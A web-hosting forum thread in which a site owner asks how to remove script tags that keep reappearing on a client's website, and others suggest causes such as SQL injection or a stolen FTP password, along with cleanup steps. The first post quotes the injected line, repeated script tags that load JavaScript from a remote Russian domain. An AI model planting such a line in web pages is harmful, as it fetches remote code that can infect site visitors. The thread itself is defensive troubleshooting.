Results 1 to 10 of 10
  1. #1
    Join Date
    May 2009
    Location
    Jammu & Kashmir
    Posts
    234

    How to get out malware/botnet virus from database/website

    Problem Described by the client:
    ------I have created one website When i hosted in server automatically adds malware,
    when viewing source code following lines are automatically added

    <script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script>

    How to get out of this malware line from my website.If i remove those lines and upload also again those line are added automatically how to solve this problem ?? how this line are added automatically ??--------

    We tried to resolve the problem by re-creating the account, installing script with fresh files etc but after few hours this problem/error cames out.
    I would be happy to receive your kind replies that might help us to resolve this problem.

    Regards,
    Wajdan

  2. #2
    Join Date
    Sep 2006
    Location
    Dallas, TX
    Posts
    333
    Is the web site generated from a database that is open to SQL injection attack?

  3. #3
    Join Date
    May 2009
    Location
    Jammu & Kashmir
    Posts
    234
    Quote Originally Posted by NeilAgg View Post
    Is the web site generated from a database that is open to SQL injection attack?
    We're not very sure. We have many other clients running same script with no problems.
    If it's a SQL injection attack, is there any way to clean the database from such kind of attacks and prevent the database from future attacks.

    Thanks for your kind replay.

  4. #4
    Join Date
    Sep 2006
    Location
    Dallas, TX
    Posts
    333
    You need to find out how the site is being attacked and plug the hole.
    Does the site use a back-end database?

  5. #5
    Join Date
    May 2009
    Location
    Jammu & Kashmir
    Posts
    234
    Quote Originally Posted by NeilAgg View Post
    You need to find out how the site is being attacked and plug the hole.
    Does the site use a back-end database?
    Yes, Database tech is MySQL.

  6. #6
    Join Date
    Sep 2006
    Location
    Dallas, TX
    Posts
    333
    Take a look at this page:
    http://en.wikipedia.org/wiki/SQL_injection
    Make sure your systems are hardened against that.

  7. #7
    Join Date
    May 2009
    Location
    Jammu & Kashmir
    Posts
    234
    Quote Originally Posted by NeilAgg View Post
    Take a look at this page:
    http://en.wikipedia.org/wiki/SQL_injection
    Make sure your systems are hardened against that.
    Would this help too? http://www.networkcloaking.com/ASPROX_Toolkit.pdf

    Thanks for your kind replies. We're waiting for more suggestions and ways to remove such kind of attacks from the database/script.

  8. #8
    Join Date
    Sep 2006
    Location
    Dallas, TX
    Posts
    333
    That is someone trying to sell you something.
    You need to understand how the attack happened.
    Nobody will be able to tell you that from the outside.

  9. #9
    Join Date
    Dec 2003
    Location
    Pakistan
    Posts
    344
    In my experience, this happens when your FTP password is compromised by some Trojan horse by decrypting password from the FTP software (in most cases, CuteFTP was installed) and this code is injected from multiple locations (random proxies).

    The solution is...

    1. Cleanup PC with an updated version of anti-virus like AVG
    2. Change FTP password
    3. Download all files and remove malicious code (Dreamweaver's find/replace works like a charm)
    4. Upload cleaned files
    5. Update password to something really C00mPl3x string
    6. use Google Webmaster tools to submit a review request to delist from Google's blacklist
    7. Keep the password updated

    It worked for every infected account for our clients!
    Muhammad Waseem
    Inspedium Corporation (Pvt) Ltd.
    InsPanel - Hosting Control Panel for Windows 2000/2003

  10. #10
    Join Date
    May 2009
    Location
    Jammu & Kashmir
    Posts
    234
    Quote Originally Posted by mwaseem View Post
    In my experience, this happens when your FTP password is compromised by some Trojan horse by decrypting password from the FTP software (in most cases, CuteFTP was installed) and this code is injected from multiple locations (random proxies).

    The solution is...

    1. Cleanup PC with an updated version of anti-virus like AVG
    2. Change FTP password
    3. Download all files and remove malicious code (Dreamweaver's find/replace works like a charm)
    4. Upload cleaned files
    5. Update password to something really C00mPl3x string
    6. use Google Webmaster tools to submit a review request to delist from Google's blacklist
    7. Keep the password updated

    It worked for every infected account for our clients!
    This has been done twice but failed.

Similar Threads

  1. Virus / Malware protection
    By Mekhu in forum Web Hosting Lounge
    Replies: 15
    Last Post: 08-04-2009, 12:45 AM
  2. Website Malware Scanning
    By C4talyst in forum Hosting Security and Technology
    Replies: 1
    Last Post: 04-09-2009, 05:27 AM
  3. Windows Anti-Virus / Anti-Malware / Firewall Applications
    By -=BfA=- in forum Dedicated Server
    Replies: 4
    Last Post: 07-17-2007, 02:46 PM
  4. How to tell if a website has had a virus embeded to it
    By lexis2004 in forum Hosting Security and Technology
    Replies: 1
    Last Post: 08-18-2006, 11:24 PM
  5. Virus from visiting a website....
    By Rewdog in forum Web Hosting Lounge
    Replies: 19
    Last Post: 12-10-2002, 04:15 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •